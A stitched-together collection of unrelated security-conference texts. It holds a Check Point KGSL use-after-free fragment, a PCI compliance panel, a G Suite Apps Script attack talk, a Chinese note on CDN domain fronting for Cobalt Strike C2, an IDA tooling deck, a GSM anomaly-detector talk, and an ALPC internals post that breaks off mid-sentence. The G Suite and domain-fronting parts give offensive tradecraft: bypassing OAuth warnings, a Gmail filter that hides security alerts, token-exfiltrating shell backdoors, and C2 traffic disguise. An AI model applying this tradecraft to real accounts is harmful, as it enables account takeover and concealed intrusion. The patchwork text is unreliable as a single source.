kgsl_mem_entry_attach_process (figure 9), binding it to a particular process. Process binding is done by either referencing kgsl_mem_entry using the “idr” mechanism, or through the GPU mapping mechanism (kgsl_mem_entry_track_gpuaddr). Once the kernel calls the idr_alloc function with kgsl_mem_entry as its argument (figure 9), attackers can free this specific id using another IOCTL (IOCTL_KGSL_GPUMEM_FREE_ID). Since there’s no access protection enforced, another thread can simply free this object, invoking an use-after-free flaw. ©2016 Check Point Software Technologies Ltd. All rights reserved. | 18 Figure 9: kgsl_mem_entry_attach_process. Access to UM is granted before initialization of entry ©2016 Check Point Software Technologies Ltd. All rights reserved. | 19 ©2016 Check Point Software Technologies Ltd. All rights reserved. Learn More About Check Point Mobile Threat Prevention Schedule a Demo
PCI: Compromising Controls and Compromising Security PCI? At DefCon? Compliance is changing the way companies "do security", and that has an effect on everyone, hacker, defender, attacker, and innocent bystander. One result is that companies fear QSAs more than 0-days. Who are we? • James Arlen, aka Myrcurial • Anton Chuvakin • Joshua Corman • Jack Daniel • Alex Hutton • Martin McKeay • Dave Shackleford Usual disclaimers • We do not speak for our employers, clients or customers. Nor for our spouses, siblings, or offspring. But my dog will back me up. • Our opinions are our own, the facts are as we see them. • We aren’t lawyers…etc. • These QSAs are not your QSAs. PCI. Discuss. • PCI vs. Security. Is it really “vs.” security? • PCI hampers the advanced. Right? Really? • At least it is timely. And the three years cycle insures that. • PCI has an impact on ALL of us, even if not under the heel of its hobnail boot. Or does it? Obligatory Bell Curve Slide More accurate curves With pictures, even. Zombie resistant housing? PCI and metrics. • PCI could provide some very useful data about security postures, exposures, breaches, and all kinds of cools stuff. • Could. • Does it? • Should it? Moving forward • How do we move forward? • Who do we have to convince? • What moves them? Previous conversations CSO Online Debate Part 1 of 2: http://www.csoonline.com/podcast/513988/The_Great_PCI_Security_Debate_of_2010_Part_1 Network Security Podcast Part 2 of 2: http://netsecpodcast.com/?p=391 Southern Fried Security Podcast – Special Episode: http://www.southernfriedsecurity.com/episodes-0-9/special-episode---interview-with-josh- corman ShmooCon 2010 http://www.shmoocon.org/2010/videos/PCI-Panel.flv BSidesSF Panel Video http://www.ustream.tv/recorded/5164678 (pt 1) http://www.ustream.tv/recorded/5165234 (pt 2) Contact us • James Arlen @myrcurial • Anton Chuvakin @anton_chuvakin • Joshua Corman @joshcorman • Jack Daniel @jack_daniel • Alex Hutton @alexhutton • Martin McKeay @mckeay • Dave Shackleford @daveshackleford Thank you Please continue the conversation, learn, engage, act. Compliance, and specifically PCI, is poised to steal security from those of us who care about it.
Hacking G Suite: The Power of Dark Apps Script Magic By @IAmMandatory (Matthew Bryant) Who am I? ● mandatory (Matthew Bryant) ● Leading the Red Team Effort at Snapchat ● @IAmMandatory ● Hacking write ups and research at https://thehackerblog.com Context & Background What exactly are we dealing with here? Google Workspace (AKA G Suite) ● Suite of Google services for employees to work together online (Gmail, Docs/Sheets/Slides, Drive, GCP etc). ● Businesses can manage employees and set up powerful security and ACL policies. ● Many of these services are used individually by free Google users as well. ● >2 billion users! Apps Script: Automate Google Services With JavaScript ● Serverless JavaScript apps which are hosted by Google and highly optimized for automating Google services. ● Seamless integration with Google’s app registration and OAuth permission requesting system. ● Variety of triggers to start scripts: web request, document open, scheduled, etc. Example of the Apps Script Editor Google OAuth 2.0 ● Allows third party apps to request access to resources owned by Google users. ● Permissions to resources are known as “scopes” and there are over 250 of them! ● Users are presented with a prompt describing roughly what access they’re granting which they can allow/reject. ● On approval you get tokens which you can use for the API(s) Example OAuth Permission Prompts Tying It All Together: Thinking Beyond the Machines ● When attacking G Suite, Apps Script is an attractive option for phishing as well as backdooring accounts. ● An Apps Script implant is outside the eyes of antivirus, endpoint detection tooling, and other on-device monitoring. ● Even if your victim wipes their laptop, your implant remains! Tough Perimeters Require Clever Attacks ● We can utilize Apps Script to pierce even the most hardened environments. ● Companies with mandatory hardware U2F on logins, hardened Chromebooks, hardware attestation, third-party OAuth scope blocking, etc. ● To get around these measures we’ll have to be a bit more clever than your average attacker... Historical Precedent “There are years where we fuck around; and there are hours where we find out” Image from @zeynep Tweet: https://bit.ly/3vDvy1z Image from Ars Technica article: https://bit.ly/2SMGqgb A Modern-Day Super Worm SOME USERS AUTHORIZE ACCESS A percentage of users who receive the phishing email fall for it. They grant the worm access to their Gmail and contacts. SPREAD Worm sends out OAuth phishing email using victim's Gmail to their 1,000 most recently modified contacts. Google Doc Worm Propagation Cycle USERS RECEIVE PHISHING EMAIL More people receive the phishing email requesting full access to their Gmail and Contacts list. The Impact ● The worm spread like wildfire and affected >1 million Google users (personal and enterprise alike). ● Google rapidly responded to the incident and was able to halt the spread and kill the apps in a few hours. ● Post-mortem analysis indicated the coding was amateur and only collected email addresses. ● Everything considered, this attack could’ve been much worse. The Attack Components ● Multiple rotating apps and domains to prevent easy-blocking by Google ● IDN homograph attack in app name ● Social engineering & clever phishing scheme ● Self-propagation via old-school email spam Post-Worm Changes & Existing Mitigations ● ~2 months later Google introduced G Suite OAuth scope and client ID allowlisting. ● Google later introduced “Sensitive” and “Restricted” scopes which require heavy review. ● Introduction of the “Unverified App” warning prompt for smaller apps requiring the aforementioned scopes. ● Crackdown on all misleading OAuth apps. Food for thought: This attack utilized zero exploits or bugs, yet the impact was substantial. Breaking New Ground Bypassing the new restrictions to pierce the G Suite perimeter The “Unverified App” prompt What is a “sensitive” or “restricted” scope? ● Any API with potential to access private data: Gmail, BigQuery, GCP, Groups, Drive, Calendar, etc. (Over ~120 total APIs) ● For apps with <100 users, “Unverified App” prompt ● For apps with >100 users you need to undergo an intense manual review process. ● However, there are some exceptions... The application uses a “sensitive” OAuth scope and… For Apps Script, what causes the “Unverified App” prompt? If the publisher of the app is in the same G Suite as the user running it, then there will be no “Unverified App” prompt. Getting Clever With Apps Script ● Apps Script apps can be a standalone project or they can be bound to Google Docs/Sheets/Slides/Forms. ● This allows for manipulation of the document, customization of the UI, etc. ● Apps Script triggers will run for all users who view the doc with Editor permissions (they still have to accept OAuth prompt for scopes). Grant User “Editor” Attempt: Make victim “Editor” on Doc and send link Victim activates trigger and spawns prompt Attacker Victim (In G Suite Org) FAILED /d/1Jl...xA/edit /d/1Jl...xA/copy Example dialogue shown from copy URL (Copied sheet is opened immediately upon clicking “Make a copy”) Send copy URL to victim: Send victim the copy link to document Victim activates trigger and spawns prompt Attacker Victim (In G Suite Org) SUCCESS Not only does the victim become the owner of the Google Sheet, they also become the publisher of the attached App Script. Problem: The Apps Script “Triggers” are not copied. How will the victim trigger our payload? Example macro in Google Sheets Assign a macro to execute upon image click in Sheets BYPASSED Another Tip for Defeating “Third-Party App”/Unverified App Restrictions ● A script “container” has the same Owner as the “container”. ● This means any Doc/Sheet/Slide which has an Owner inside a GSuite domain (e.g. company.com) is a bypass waiting to happen. ● If you have edit access to any Doc/Sheet/Slide made by someone in a GSuite domain, you can create an Apps Script app and bypass the “third-party app” restrictions! Post-Compromise Pivoting & Privilege Escalation Moving right along Pivoting to Google Cloud (GCP) Accessing Google Cloud Through Apps Script ● If your Apps Script service has the https://www.googleapis.com/auth/cloud-platform scope, you can access any GCP API as the user who granted your app access. ● You can then use the access token from ScriptApp.getOAuthToken() in Authorization: Bearer {{TOKEN}}. Some unknown project number? Some *mostly* undocumented fun... ● All Apps Scripts upon creation are allocated a hidden Google Project attached to them (yes really). ● This makes requests with your access token implicitly bound to this project, which has no APIs enabled. ● To get around this, you can specify the x-goog-user-project header followed by the project name you want to query. ID of the GCP Project Google Cloud Shell API ● Google Cloud Shell API allows you to add your public key, start, and connect to a virtual Linux instance via SSH. ● Using the API you can specify an access/ID token to authorize the pre-installed gcloud CLI for. Mining Google Drive for Paydirt Sharing in Google Drive Preset Defaults & Hardened Settings ● By default sharing with the entire org is one-click away with the default being shared only with those explicitly added to the doc. This is the tightest default control available for link sharing. ● Once a G Suite org user views a document, it is searchable by them in the future. ● The document URLs are well outside the range of brute forcing. Real world usage: what actually happens? ● Any important file, by definition, is shared with other users. ● Adding individual users one-by-one to a doc is tedious (though Google Groups can be used). ● In practice, a large portion of the docs are just shared by link and only a tiny portion are searchable by the entire org. ✓ Easy ✕ Painful How can we get access to these docs? ● Search internally-shared systems: chat, forums, Q&A sites, ticket management queues, bug trackers, etc. ● The same way we do on the web: spidering. An Apps Script Spider ● Takes a list of seed Drive/Doc/Sheet/Slide links as starting points and recursively crawls using Apps Script until it’s exhausted all paths. ● Along the way collects metadata for sharing, contents, creation, authors, etc for review. ● https://github.com/mandatoryprogrammer/PaperChaser Dumping Employee Directory with the People API Pull the Entire Organization’s Directory via People API ● Requires the https://www.googleapis.com/auth/ directory.readonly scope ● Contains everything from names, emails, titles, phone numbers, birthdays, addresses, calendar URL, etc. ● This is very useful for further spear fishing, or for re-entry planning upon being detected and revoked. Privilege Escalation The fastest way you’ll move up in a companyTM Exploiting Apps Script Attached to a Google Doc/Sheet/Slide Revisiting Apps Script Bound to Docs/Sheets/Slides ● Recall we talked about Apps Script as being able to be “bound” to Docs/Sheets/Slides. The file a script is bound to is called the “container”. ● If that’s the case, does the Apps Script and the file it’s attached to have separate sharing permissions? (https://developers.google.com/apps-script/guides/bound) Another Interesting Question ● Recall that “Edit” access is required to run the Apps Script. ● Whoever has “Edit” access to a given Doc/Sheet/Slide will also be able to Edit the Apps Script attached to it. ● What happens when you have a bunch of people all sharing the same Doc/Sheet/Slide which has Apps Script? EDITOR EDITOR EDITOR Situation: Many users have editor on a Doc With Apps Script. They have all granted the Apps Script OAuth scopes on their own accounts. A malicious user has editor on the Doc as well. The malicious user edits the Apps Script to contain a malicious script. Upon each user triggering the already-authorized Apps Script, the malicious code runs as them. Let’s Do One Better ● This of course requires we wait for whatever triggers are in place to be re-fired. ○ In the case of background time-based triggers, that’s fine we can wait. ● We can force a re-trigger by publishing the bound script as a web app. When this URL is visited by one of the users who authorized the script it will execute as them. ● This works even if triggered via <img>, etc! Lateral Movement via Enumerating and Joining Open Google Groups Google Groups, a PrivEsc Factory ● Google Groups are often used for ACL in GCP/IAM. ● By default, Google Groups are openly joinable by everyone in an org. What can be gated by Google Groups? Google Group API Access via Apps Script ● Modifying Google Groups via Apps Script is not as easy as it sounds. ● The Google Groups Settings/Directory API is restricted to admins only. ● However, the “Cloud Identity API” is available to all users which allows some access to Google Groups via API. What can you do via API for Google Groups? ● List all Google Groups in a given organization. ● List Google Group’s members and their roles. ● Create, update, delete, manage members of your own groups. ● NOT able to join an open Google Group via the API. Better Spear Phishing With Google Groups Google Group Trick: With Manual Access ● Obtain any untaken email @company.com using Google Groups (external emails to Google Groups must be enabled for the org). ● Add and verify the email as an alias in Gmail and you can now send and receive mail at the address. Google Group Trick: With Manual Access ● You’ve now upgraded your spear-phishing game 200%. Bonus Trick ● Bonus: If an alias is taken, you can add dots to it and receive emails at that address. This is (confusingly) the opposite behavior of regular Gmail which treats dots as irrelevant. Backdoors, Stealth, & Persistence Why not stick around? Gmail Trickery Gmail Tricks: With API Access ● Create a filter to hide security notifications from Google: from:(no-reply@accounts.google.com) “Security Alert” ● Filter to hide password reset emails to be exfiltrated by Apps Script implant. ● Sadly creation of Delegates and Forwarding Addresses are intentionally restricted to service accounts with delegated domain-wide authority. Gmail Tricks: With Manual Access ● Create forwarding address and create a filter to send matching emails to this address (or forward all mail). Setting a More Deceptive App Name Homoglyph Attacks: Post Google Doc Worm ● After the Google Doc worm Google upgraded its anti-homoglyph prevention, banning similar-looking unicode characters, no-width-spaces, etc. ● However, the magic of the Right-to-Left Override (RTL) character (U+202E) still works. Perpetual Apps Script Execution Keeping the Good Times Rolling ● Apps Script has time-based triggers allowing for background execution on a schedule. ● Can be run as often as every minute and executes as whatever user was running the script that created the trigger. More of a Suggestion Really ● You can still create time triggers programmatically without declaring this scope. ● Time triggers can be created upon other triggers firing, they only require the user has authorized some scope to start firing. ● Persist indefinitely, no warnings required. Backdoor Google Cloud Projects Google Cloud Functions ● Create Google Cloud Functions (GCFs) which execute as privileged service accounts on a project. Google Cloud Shell Backdoor ● Add a backdoor to the Google Cloud Shell .bashrc to exfiltrate access tokens or just connect back (Credit: @89berner) IAM Policy Backdoor ● Create IAM policies allowing your own projects access back in.
0x00 背景 ⽬前的攻防场景,攻击成本的节约、周期短,成果要求⾼成了普遍要⾯对的问题,所以 对于基础设施的建设越来越重视,⼀键⾃动化的部署CS、Frp gen等⼯具的开发,节省了以 前略⻓的搭建配置时间,变相增加攻击有效时间;优化的Profile,⽐如修改⼀些默认标记 位、流量伪装、关闭stager等,成熟的OPSEC,⽐如杀软度测试、攻击⼿法检测测试、上传 ⽂件清除流程等,减少了免杀难度系数,增加溯源难度的同时,也减少团队协作中执⾏了⼀ 些被杀软标记的攻击⽅式导致掉点的可能性。前两天刚好聊到域前置的节点⽩域名收集及验 证,内部以前也简单分享过,遂炒冷饭。 0x01 CDN and 域前置的原理 只要别 ping cdn 节点,然后HTTP Hosts⾥放⼀堆IP⽽不⽤域名就⾏,求求了,放过队 友吧。关于原理,⾮科普不是重点,略 0x02 CDN滥⽤域名抢注 CDN滥⽤域名抢注腾讯云->云产品->CDN与加速->内容分发⽹络->域名管理->域名管理 1> 添加域名涉及到抢注问题,⾮必要不抢注主域名,⽬前已经有⽩名单针对⼀些域名添 加了归属权校验。 2> 项⽬优先使⽤当前⽬标主域名进⾏加速,⼦域名可以为存在的域名⽐如www.xxx.co m.若抢注失败,则优先考虑正常电脑会产⽣外连的域名,⽐如软件、视频、杀软、搜索引擎 等 3> 域名必须是真实存在,已经在⼯信部进⾏过备案的 域名配置添加 0x03 寻找同⼀CDN下⾯可以进⾏流量转发的域名 如何寻找同⼀CDN下⾯可以进⾏流量转发的域名呢? 这个其实是本次分享重点想讲的东⻄。CDN的原理中,DNS系统会最终将域名的解析权 交给CNAME(CDN⼚商域名)指向的CDN专⽤DNS服务器,CDN的DNS服务器将CDN的全局 负载均衡设备IP地址返回⽬标机器,那就代表着我们的CDN负载的IP历史解析中,是否会有 这样符合标准的域名呢? 1>第⼀种简单的⽅法,⽤站⻓之家的ping功能去ping CNAME记录 (sdwdsdw.xxxxx.com.w.kunlunca.com),然后使⽤威胁平台,⽐如TI、微步在线等进⾏ip解析 域名查询 PS:验证⽅法(curl -k -v https://oss.takeoa.com -H "Host: sdwdsdw.xxxxx.com"), 并查看CS的web log是否有请求记录。 2>第⼆种⽅法,涉及到国内各CDN⼚商CNAME后缀,我们观察阿⾥或者腾讯的CDN申 请以后的CNAME后缀都是有⼀定规则或者说固定域名的。 xxxx.xxx.com.dsa.dnsv1.com xxxx.xxx.com.w.kunlunca.com 我们通过 nslookup www.cdn.dnsv1.com 可以获得使⽤最近CDN节点的公⽹IP 然后获取其他也托管在该⼚商并使⽤CDN的合法域名(⽐如:xxxxx) 通过威胁情报查询这两个ip或www.cdn.dnsv1.com,查看历史解析。 这些ip上的历史解析都可以⽤,可以继续追寻IDC,寻找 m.leha.com.cdn.dnsv1.com具有.cdn.dnsv1.com的域名,去掉后边,访问前⾯是否 具有https绿标证书 先简单的说两种⽅法,其实这两种可以扩张很多种⼩tips。 0x04 简单流量分析及⽩名单 0x05 结尾 中间可能还有⼀些⽐如Window机器通过Powershell⾛域前置拉取脚本上线、CrossC2通 过域前置上线Linux机器等⼀些⼩tips,我想⼤家也都会,就不嫌丑了,具体的⽹络⾏为分析 及流量分析、检测及解决办法也都略掉了,关于之前聊的⽩名单出⽹场景,就仁者⻅仁,智 者⻅智了,⽤过的都说好。
TOOLSMITHING AN IDA BRIDGE: A TOOL BUILDING CASE STUDY Adam Pridgen Matt Wollenweber Presentation Agenda • Motivation and Purpose • Toolsmithing • Identifying the short-cuts to meet project needs • Processes for Expediting Development • Prototyping, Modifying, Testing, Restart?!? • Extension development with WinDbg • Idabridge demonstration Introductions: Adam • TODO Add pertinent Information • Who I am. • What I have done. • Where I am going. Introductions: Matt • TODO Add pertinent Information • Who I am. • What I have done. • Where I am going. Motivation and Purpose • Learn and teach methods for developing tools • Introduce toolsmithing to those interested in tool development • Discuss what we learned from implementing our tool • Release an Alpha version of our idabridge Toolsmithing • Toolsmithing is the process of making tools • Tools can be in any space • Generally, not a standalone application • Ranges from short scripts to full blown libraries • Focus on utility not usability • Takes on the following forms – X is needed to make Y create widgets – Z needs to be built, but nothing exists currently Toolsmithing Tools • High Level Languages (Python or Ruby) • HL Programming Environments (iPython) • Debuggers (PDB, WinDbg, Olly, etc.) • Network Sniffers for network debugging • Books and code lying around the home or net • Anything that gets the job done fast Our Toolsmithing Process • Building is Believing • Loner Development Squads • The World is Big Chances are it exists • Don’t reinvent the wheel, steal one • KISS your tools they love you Building is Believing • Good tools are not built overnight – Sometimes maybe • Build it once to get an idea • Build it again because the 2nd time shine • Third time is a charm • More than one implementation is likely – idabridge’s cmd handling took 3 iterations • Build to what is needed now Loner Development Squads • Creating Milestones – Milestones should aggregate into something – Keep milestones small when developing alone – Keep a friend (esp one who cares) on speed dial • Writing concise and re-usable – Think about what is being developed – Make it abstract and re-usable – Time is critical, if you can think of anything, just go The World is Big… • Open Source is the best source for help • Code can be reviewed and repurposed • Existing code is fantastic for real-world examples • Documentation and APIs don’t run in debuggers • Implementing complex components – Building a fuzzer, take someone elses protocol impl. – Building a DNS Mapping tool, use BIND for the DNS Introducing idabridge • Extensible network listener for IDA Pro • Gives IDA users a “remote control” • Implements a async. Network listener • Provides extensibility using a Python Class • Aims to be a middleware layer for other tools: – Binary Diffing – Debuggers – Other frameworks such as Radare Current State of Tings • Users are moving to “cloud” based solutions • Collaboration among analysts and users • Federation of data – Moving data from whatever to wherever • Heterogenous tool chests and chains • Employers and contracts – Cool tools are developed, but may not leave closed environments Goals and Challenges • Investigate cloud based reversing tools • Evaluate the feasibility for a middleware for our current tools • Determine what tools will make a difference • Future direction for supporting technologies – Cloud based Python Interpreter – Migration of Binaries and environment for analysis Idabridge Components • IDA Pro networking client • WinDbg network server • Python environment Exported from IDAPython • Command Handler for Debuggers and IDA Pro – VDB/Vtrace – WinDbg – IDA Pro Tools Used for Development • Visual Studio for C/C++ on Windows – Debugging a debugger?!? – IDE • iPython & Python – Used to create scripts to write code and classes – Functional code testing – Data manipulation and verification – Server mock-ups to test the initial cmd handling Development Environments • Windows 7, 64-bit – VS 2010 – IPython • Windows XP VM, 32-bit – VS 2010 – … Overall Lessons Learned • Debugging Debuggers • Write Scripts to Implement code – Parsing IDAPython APIs – Implementing Python Command Handlers – Writing Long Logic C++ Statements – Creating Stub Functions Toolsmithing: Research Phase • Initial Research and Development: 90 Hours – Researching code and capabilities (IDA Pro and WinDbg) – Learning APIs and how to use them – Planning, Testing, Adjusting – Includes Coding and Testing • Created a GUI to simulate a debugger • Implemented IDA Commands Manually Using C++ only • Implemented Separate Command Handling on Platforms • Mostly “Get it working phase” Toolsmithing: Research Phase • Lessons Learned – Write scripts to write code and functions – Wrote a “dumb” server to send and reply to msg.s – Documentation is not your friend find examples – Find examples that have been repeated Toolsmithing: Phase 2 • Defcon Talk accepted, resumed development • Development: 60 Hours (2 weeks) – Developed an Abstract Cmd Handler Based on Names – Included Typed Argument Marshaling (str, int, long, byte) – Combined the Network Stack and Handling • Never tested and threw out most of the code • Realized atm there was no added value • Breakthrough was the command handling • Combined source and functionality Toolsmithing: Cmd Handler • Development: 30 Hours (1.5 weeks) – Developed the abstract handler – Added IDAPython Bridge to the mix • Figured out how to add IDA Python Bridging Toolsmithing: Cmd Handler • Development: 20 Hours – Added Python as the Main Command Handling – Co-Developed Vtrace/VDB command handling Idabridge Demonstration Conclusions • Creativity, Patience, Persistence, and Tenacity • Motivation relies on small milestones • Expectations are limited by time frame • Tool Code quality != production CQ • <FINAL PROJECT Data> Idabridge information • Special Thanks To: – Praetorian – C. Eagle and T. Vidas for Collabreate – E. Erdelyi for IDAPython – Pusscat / Lin0xx for Byakugan • Code URL – http://TBD • Presentation URL – http://TBD Questions & Comments – Adam.pridgen@[ thecoverofnight.com || praetorian.com] – mjw@cyberwart.com
SITCH Inexpensive, coordinated GSM anomaly detection About Me • 2000: Technology career started (I can get paid for this??) • 2003: Started building with Linux • Came to infosec through systems and network engineering, integration • Security tools and integration (SIEM, HIDS, etc…) • Current: R&D –Ashmastaflash “Thoughts and opinions expressed are my own. If you take anything away from this talk and act on it, I’m not responsible if you go to jail, become a pariah, or your dog stops liking you. Know the laws you’re subject to and operate accordingly.” What We’re Covering Today • Why Care? • Current Threat and Detection Landscape • Project Goals • SITCH: MkI • SITCH: MkII • Service Architecture • Future Plans • Prior Art • Q&A Why Care? • Invasions of privacy are bad, even when they’re unnoticed. • Industrial espionage costs money and jobs. WTF Is Under All That?? Is Anybody Home? Terminology • Software Defined Radio (SDR): Using software to perform signal processing in concert with an adjustable-frequency RF receiver • FCCH: Frequency Correction Channel • ARFCN: Absolute Radio Frequency Channel Number • CGI: Cell Global ID (MCC + MNC + LAC + CI) • IMSI: International Mobile Subscriber Identity GSM Addressing Threat and Detection Landscape • Malicious Devices • Indicators of Attack • Existing Detection Methods Hacked Femtocell Trusted part of provider’s network Your phone doesn’t know it’s evil Evil BTS Handset will automatically associate, unable to assert trustworthiness Indicators of Attack • ARFCN over threshold • ARFCN outside forecast • Unrecognized CGI • Gratuitous BTS re-association • BTS detected outside of range Existing Detection Methods • Commercial Options: • Pwnie Express • Bastille Networks • Open Source: • Fake BTS • AIMSICD • Femto Catcher Project Goals • Inexpensive (what can I get for $100?) • Small footprint, low power requirements preferred • Functional Targets: Indicators of Attack (IOA) Coverage Tested Hardware (some of it, anyway) Functional Targets • ARFCN over threshold • ARFCN outside of forecast • Unrecognized CGI • Gratuitous BTS re-association • BTS detected out of range SITCH Sensor MkI SITCH Sensor MkI MkI Results Targets MkI Coverage ARFCN over threshold YES ARFCN outside of forecast YES Unrecognized CGI NO Gratuitous BTS re-association NO BTS detected outside of range NO Price ~$100 Start Demo Here! • Install SD Card • Confirm registration • Set device-specific environment variables • Move from staging to production application SITCH Service Architecture SITCH Intelligence Feed • OpenCellID Database: • MCC, MNC, Lat, Lon, Range • Twilio: • MCC, MNC, CarrierName SITCH Sensor MkII SITCH Sensor MkII SITCH Sensor MkII SITCH Sensor MkII SITCH Sensor MkII MkI, MkII Results Targets MkI Coverage MkII Coverage ARFCN over threshold YES YES ARFCN outside of forecast YES YES Unrecognized CGI NO YES Gratuitous BTS re-association NO YES BTS detected outside of range NO YES Price ~$100 ~$150 Return to Demo! • Slack alerts • Tessera graphs • Kibana scan search • Resin logs Going Forward • Automatic device detection • Device and service heartbeats • Gnuradio = pure SDR: • GR-GSM • ADS-B • FPV drone • Dedicated radios: • Ubertooth One • YARD Stick One Prior Art • DIY Cellular IDS (Davidoff, Fretheim, Harrison, & Price, Defcon 21) • Traffic Interception and Remote Mobile Phone Cloning with a Compromised Femtocell (DePerry, Ritter, & Rahimi, Defcon 21) • Introduction to SDR and the Wireless Village (DaKahuna & Satanklawz, Defcon 23) • http://fakebts.com - Fake BTS Project (Cabrera, 2014) • How to Build Your Own Rogue GSM BTS for Fun and Profit (Simone Margaritelli) • Gnuradio (many) • Gr-gsm (Krysik, et al.) • Kalibrate (thre.at) THANKS! • John Menerick • Gillis • Pedro Cabera • Piotr Krysik • Thre.at • Gnuradio • Silent Contributors… Q&A
Offensive Windows IPC Internals 3: ALPC 24 May 2022 Contents: Introduction ALPC Internals The Basics ALPC Message Flow ALPC Messaging Details ALPC Message Attributes Putting the pieces together: A Sample Application Attack Surface Identify Targets Impersonation and Non-Impersonation Unfreed Message Objects Conclousion Appendix A: The use of connection and communication ports References Introduction After talking about two inter-process communication (IPC) protocols that can be uses remotely as well as locally, namely Named Pipes and RPC, with ALPC we’re now looking at a technology that can only be used locally. While RPC stands for Remote Procedure Call, ALPC reads out to Advanced Local Procedure Call, sometimes also referenced as Asynchronous Local Procedure Call. Especially the later reference (asynchronous) is a reference to the days of Windows Vista when ALPC was introduced to replace LPC (Local Procedure Call), which is the predecessor IPC mechanism used until the rise of Windows Vista. A quick word on LPC The local procedure call mechanism was introduced with the original Windows NT kernel in 1993- 94 as a synchronous inter-process communication facility. Its synchronous nature meant that clients/servers had to wait for a message to dispatched and acted upon before execution could continue. This was one of the main flaws that ALPC was designed to replace and the reason why ALPC is referred to by some as asynchronous LPC. ALPC was brought to light with Windows Vista and at least from Windows 7 onward LPC was completely removed from the NT kernel. To not break legacy applications and allow for backwards compatibility, which Microsoft is (in)famously known for, the function used to create an LPC port was kept, but the function call was redirected to not create an LPC, but an ALPC port. As LPC is effectively gone since Windows 7, this post will only focus on ALPC, so let’s get back to it. But, if you’re - like me - enjoy reading old(er) documentations of how things started out and how things used to for work, here’s an article going in some detail about how LPC used to work in Windows NT 3.5: http://web.archive.org/web/20090220111555/http://www.windowsitlibrary.com/Content/356/08/1.html Back to ALPC ALPC is a fast, very powerful and within the Windows OS (internally) very extensively used inter- process communication facility, but it’s not intended to be used by developers, because to Microsoft ALPC is an internal IPC facility, which means that ALPC is undocumented and only used as the underlying transportation technology for other, documented and intended-for-developer- usage message transportation protocols, for example RPC. The fact that ALPC is undocumented (by Microsoft), does however not mean that ALPC is a total blackbox as smart folks like Alex Ionescu have reverse engineered how it works and what components it has. But what it does mean is that you shouldn’t rely on any ALPC behavior for any long-term production usage and even more you really shouldn’t use ALPC directly to build software as there are a lot of non-obvious pitfalls that could cause security or stability problems. If you feel like you could hear another voice on ALPC after reading this post, I highly recommend listening to Alex’s ALPC talk from SyScan’14 and especially keep an ear open when Alex talks about what steps are necessary to release a mapped view (and that’s only addressing views) from your ALPC server, which gets you at around minute 33 of the talk. So what I’m saying here is: ALPC is a very interesting target, but not intended for (non-Microsoft) usage in production development. Also you shouldn’t rely on all the information in this post being or continue to be 100% accurate as ALPC is undocumented. ALPC Internals Alright let’s get into some ALPC internals to understand how ALPC works, what moving parts are involved in the communications and how the messages look like to finally get an idea of why ALPC might be an interesting target from an offensive security standpoint. The Basics To get off from the ground it should be noted that the primary components of ALPC communications are ALPC port objects. An ALPC port object is a kernel object and its use is similar to the use of a network socket, where a server opens a socket that a client can connect to in order to exchange messages. If you fire up WinObj from the Sysinternals Suite, you’ll find that there are many ALPC ports running on every Windows OS, a few can be found under the root path as shown below: … but the majority of ALPCs port are housed under the ‘RPC Control’ path (remember that RPC uses ALPC under the hood): To get started with an ALPC communication, a server opens up an ALPC port that clients can connect to, which is referred to as the ALPC Connection Port, however, that’s not the only ALPC port that is created during an ALPC communication flow (as you’ll see in the next chapter). Another two ALPC ports are created for the client and for the server to pass messages to. So, the first thing to make a mental note of is: There are 3 ALPC ports in total (2 on the server side and 1 on the client side) involved in an ALPC communication. The ports you saw in the WinObj screenshot above are ALPC Connection Ports, which are the ones a client can connect to. Although there are 3 ALPC ports used in total in an ALPC communication and they all are referred to by different names (such as “ALPC Connection Ports”), there is only a single ALPC port kernel object, which all three ports, used in an ALPC communication, instantiate. The skeleton of this ALPC kernel object looks like this: As it can be seen above the ALPC kernel object is a quite complex kernel object, referencing various other object types. This makes it an interesting research target, but also leaves some good margin for errors and/or missed attack paths. ALPC Message Flow To dig deeper into ALPC we’ll have a look into the ALPC message flow to understand how messages are sent and how these could look like. First of all we’ve already learned that 3 ALPC port objects are involved in an ALPC communication scenario, with the first one being the ALPC connection port that is created by a server process and that clients can connect to (similar to a network socket). Once a client connects to a server’s ALPC connection port, two new ports are created by the kernel called ALPC server communication port and ALPC client communication port. Once the server and client communication ports are established both parties can send messages to each other using the single function NtAlpcSendWaitReceivePort exposed by ntdll.dll. The name of this function sounds like three things at once - Send, Wait and Receive - and that’s exactly what it is. Server and client use this single function to wait for messages, send messages and receive messages on their ALPC port. This sounds unnecessary complex and I can’t tell you for sure why it was build this way, but here’s my guess on it: Remember that ALPC was created as a fast and internal-only communication facility and the communication channel was build around a single kernel object (the ALPC port). Using this 3-way function allows to do multiple operations, e.g. sending and receiving a message, in a single call and thus saves time and reduces user- kernel-land switches. Additionally, this function acts as a single gate into the message exchange process and therefore allows for easier code change and optimizations (ALPC communication is used in a lot of different OS components ranging from kernel drivers to user GUI applications developed by different internal teams). Lastly ALPC is intended as an internal-only IPC mechanism so Microsoft does not need to design it primarily user or 3rd party developer friendly. Within this single function you also specify what kind of message you want to send (there are different kinds with different implications, we’ll get to that later on) and what other attributes you want to send along with your message (again we’ll get to the things that you can send along with a message later on in chapter ALPC Message Attributes). So far this sounds pretty straight forward: A server opens a port, a client connects to it, both receive a handle to a communication port and send along messages through the single function NtAlpcSendWaitReceivePort … easy. We’ll on a high level it is that easy, but you surely came here for the details and the title of the post said “internals” so let’s buckle up for a closer look: 1. A server process calls NtAlpcCreatePort with a chosen ALPC port name, e.g. ‘CSALPCPort’, and optionally with a SecurityDescriptor to specify who can connect to it. The kernel creates an ALPC port object and returns a handle this object to the server, this port is referred to as the ALPC Connection Port 2. The server calls NtAlpcSendWaitReceivePort, passing in the handle to its previously created connection port, to wait for client connections 3. A client can then call NtAlpcConnectPortwith: The name of the server’s ALPC port (CSALPCPort) (OPTIONALLY) a message for the server (e.g. to send a magic keyword or whatever) (OPTIONALLY) the SID of server to ensure the client connects to the intended server (OPTIONALLY) message attributes to send along with the client’s connection request (Message attributes will be detailed in chapter ALPC Message Attributes) 4. This connection request is then passed to the server, which calls NtAlpcAcceptConnectPort to accept or reject the client’s connection request. (Yes, although the function is named NtAlpcAccept… this function can also be used to reject client connections. This functions last parameter is a boolean value that specifies if connection are accepted (if set to true ) or rejected (if set to false ). The server can also: (OPTIONALLY) return a message to the client with the acceptance or denial of the connection request and/or… (OPTIONALLY) add message attributes to that message and/or .. (OPTIONALLY) allocate a custom structure, for example a unique ID, that is attached to the server’s communication port in order to identify the client — If the server accepts the connection request, the server and the client each receive a handle to a communication port — 5. Client and server can now send and receive messages to/from each other via NtAlpcSendWaitReceivePort, where: The client listens for and sends new messages to its 